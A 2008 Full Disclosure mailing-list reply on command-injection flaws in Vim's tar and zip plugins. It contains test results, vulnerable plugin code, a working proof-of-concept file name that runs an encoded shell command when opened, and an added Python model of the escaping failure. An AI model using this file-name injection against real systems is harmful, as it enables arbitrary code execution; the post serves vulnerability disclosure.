Full Disclosure mailing list archives
Re: Collection of Vulnerabilities in Fully Patched Vim 7.1
From: "Jan Minář" <rdancer () rdancer org>
Date: Tue, 1 Jul 2008 20:36:29 +0100
On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <Bram () moolenaar net> wrote:
> Jan Minar wrote:
> > 1. Summary
> >
> > Product  : Vim -- Vi IMproved
> > Version  : Tested with 7.1.314 and 6.4
> > Impact   : Arbitrary code execution
> > Wherefrom: Local and remote
> > Original : http://www.rdancer.org/vulnerablevim.html
> >
> > Improper quoting in some parts of Vim written in the Vim Script can lead to arbitrary code execution upon opening a crafted file.
>
> Note that version 7.1.314, as reported in the Summary, does not have most of the reported problems. The problems in the plugins have also been fixed; this requires updating the runtime files. Information about that can be found at http://www.vim.org/runtime.php
I do apologize: as written in the advisory, the version I worked with was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have updated the advisory at http://www.rdancer.org/vulnerablevim.html . Thanks to Bram for all the good work.

7.2a.10 with updated runtime is still vulnerable to the zipplugin attack, and an updated tarplugin attack:

-------------------------------------------
-------- Test results below ---------------
-------------------------------------------
filetype.vim
  strong           : EXPLOIT FAILED
  weak             : EXPLOIT FAILED
tarplugin          : EXPLOIT FAILED
tarplugin.updated  : VULNERABLE
zipplugin          : VULNERABLE
xpm.vim
  xpm              : EXPLOIT FAILED
  xpm2             : EXPLOIT FAILED
  remote           : EXPLOIT FAILED
gzip_vim           : EXPLOIT FAILED
netrw              : EXPLOIT FAILED

The original tarplugin exploit now produces a string of telling error messages:

/bin/bash: so%: command not found
tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
/bin/bash: retu: command not found
/bin/bash: bar.tar|retu|'bar.tar: command not found

It's easy to see that it is still possible to execute arbitrary shell commands. $VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:

  136   if tarfile =~# '\.\(gz\|tgz\)$'
  137 "   call Decho("1: exe silent r! gzip -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
 *138    exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
  139   elseif tarfile =~# '\.lrp'
  140 "   call Decho("2: exe silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - ")
 *141    exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - "
  142   elseif tarfile =~# '\.bz2$'
  143 "   call Decho("3: exe silent r! bzip2 -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
 *144    exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
  145   else
  146 "   call Decho("4: exe silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile))
**147    exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile)
[...]
  444 fun s:Escape(name)
  445 " shellescape() was added by patch 7.0.111
  446   if exists("*shellescape")
  447    let qnameq= shellescape(a:name)
  448   else
  449    let qnameq= g:tar_shq . a:name . g:tar_shq
  450   endif
  451   return qnameq
  452 endfun

(*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.
(**) tar(1) allows arbitrary command execution via options ``--to-command'', and ``--use-compress-program''.

The updated tarplugin attack is rather simple:

$ rm -rf ./*
$ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 | xxd -r\`;'bar.tar"
$ vim +:q ./foo*
$ ls -l pwned
-rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned

Cheers,
Jan Minar.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
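Why the (*) lines above break even with shellescape() in place, as an added example that is not code from the post or from Vim: the :! and :r! commands expand an unescaped % to the current file name after the plugin has already quoted the argument, and the file name is inserted verbatim, so a name containing % and ' reopens the quoting and turns one tar invocation into several shell commands. The Python below is a model of Vim's shellescape(), of the % expansion done by :!, and of a POSIX tokenisation of the result, driven by the file name that the post's touch command creates. Assumptions of this model: the browse options string is taken to be 'tf', only %, # and ! are treated as :! specials, and the special=True branch models current Vim's shellescape({string}, 1), which backslash-escapes those characters so that :! leaves them alone.

```python
import shlex

# Constructed sample: the file name created by the post's `touch` command.
CRAFTED_NAME = "foo%;eval eval `echo 0:64617465203e2070776e6564 | xxd -r`;'bar.tar"


def shellescape(name, special=False):
    """Model of Vim's shellescape() for a POSIX shell: wrap the name in
    single quotes and turn every embedded ' into '\\''.  With special=True
    (the {special} argument of current Vim) also backslash-escape the
    characters that the :! command itself expands.  Assumption: only %, #
    and ! are modelled as specials."""
    out = "'" + name.replace("'", "'\\''") + "'"
    if special:
        for ch in "%#!":
            out = out.replace(ch, "\\" + ch)
    return out


def expand_bang_specials(cmdline, curfile):
    """Model of what Vim does to a :! / :r! command line before it reaches
    the shell: an unescaped % is replaced by the current file name, inserted
    verbatim with no quoting, and \\% is turned back into a literal %.
    # and ! are treated the same way here; only % is exercised below."""
    out, i = [], 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == "\\" and i + 1 < len(cmdline) and cmdline[i + 1] in "%#!":
            out.append(cmdline[i + 1])      # \% -> literal %
            i += 2
        elif c == "%":
            out.append(curfile)             # % -> current file name, unquoted
            i += 1
        else:
            out.append(c)
            i += 1
    return "".join(out)


def split_commands(shell_line):
    """Tokenise a shell line with POSIX quoting rules and split it into
    separate commands at unquoted ';'.  shlex's punctuation_chars mode
    returns ';' as its own token; command substitution is not performed,
    so backticks stay as literal text inside the tokens."""
    lex = shlex.shlex(shell_line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    commands, current = [], []
    for tok in lex:
        if tok == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def tar_browse_line(tarfile, special):
    """Build the shell line that the plugin's branch (**) hands to :r!
    (browse options assumed to be 'tf'), then apply the % expansion that
    :! performs with the tar file as the current file."""
    vimscript_side = "tar -tf " + shellescape(tarfile, special)
    return expand_bang_specials(vimscript_side, curfile=tarfile)


if __name__ == "__main__":
    for special in (False, True):
        cmds = split_commands(tar_browse_line(CRAFTED_NAME, special))
        print(f"special={special}: {len(cmds)} shell command(s)")
        for cmd in cmds:
            print("   ", cmd)
```

With special=False the single quoted argument becomes three commands, the second of which starts with `eval eval`; with special=True the shell sees exactly one command, `tar -tf` followed by the crafted name as a single argument.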